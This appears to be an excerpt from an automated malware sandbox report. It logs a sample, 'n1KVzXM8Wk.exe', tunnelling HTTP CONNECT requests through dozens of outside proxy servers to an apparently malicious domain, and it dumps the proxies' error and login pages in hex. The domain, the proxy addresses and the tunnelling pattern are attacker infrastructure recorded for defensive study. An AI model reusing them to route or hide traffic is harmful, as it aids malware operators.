4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      516192.168.2.4515748.213.129.1599996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.866942883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.158749104 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      517192.168.2.45162495.84.166.13880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.877811909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      518192.168.2.451368111.53.178.24973026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.881690979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      519192.168.2.45162779.143.187.58552156812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.898710966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.474992990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178637981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.680345058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.365974903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178401947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.866012096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      520192.168.2.451619190.128.228.182806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.916210890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.169586897 CET1286INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Server: Apache/2.4.56 (Ubuntu)
                                                                                                      Set-Cookie: PHPSESSID=cu42n6lqgesgaerlirj38c8pkn; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Vary: Accept-Encoding
                                                                                                      Content-Length: 5101
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                                      Feb 23, 2024 09:45:21.169673920 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                                      Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                                      Feb 23, 2024 09:45:21.169728041 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                                      Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
                                                                                                      Feb 23, 2024 09:45:21.169914961 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                                      Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                                      Feb 23, 2024 09:45:21.169929981 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                                      Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                                      Feb 23, 2024 09:45:21.170737028 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 5b 20 30 7f 2d 54 8e 34 0c 23 4d e9 28 a4 ce 69 58 15 58 9c 91 3f dd 66 82 e4 16 d0 29 b5 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[ 0-T4#M(iXX?f)*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                                      Feb 23, 2024 09:45:21.423989058 CET494INHTTP/1.1 400 Bad Request
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Server: Apache/2.4.56 (Ubuntu)
                                                                                                      Content-Length: 312
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      521192.168.2.451557202.162.219.1210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.916727066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      522192.168.2.45154945.133.168.14680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.924918890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      523192.168.2.450987117.160.250.16380816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.933923960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.443689108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.022346973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.747494936 CET221INHTTP/1.1 403 Access Denied
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-store
                                                                                                      Content-Type: text/html
                                                                                                      Content-Language: en
                                                                                                      Content-Length: 43
                                                                                                      Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                      Data Ascii: You are not allowed to access the document.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      524192.168.2.451561182.253.109.24480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.937835932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.508876085 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      525192.168.2.450823104.21.80.83806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.957523108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.045177937 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      526192.168.2.451658200.43.231.841536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.958110094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      527192.168.2.45170623.19.244.10910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.961680889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      528192.168.2.451680174.77.111.19741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.962344885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      529192.168.2.451642114.156.77.10780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.967587948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.339535952 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Cache-Control: no-cache
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Length: 4897
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b
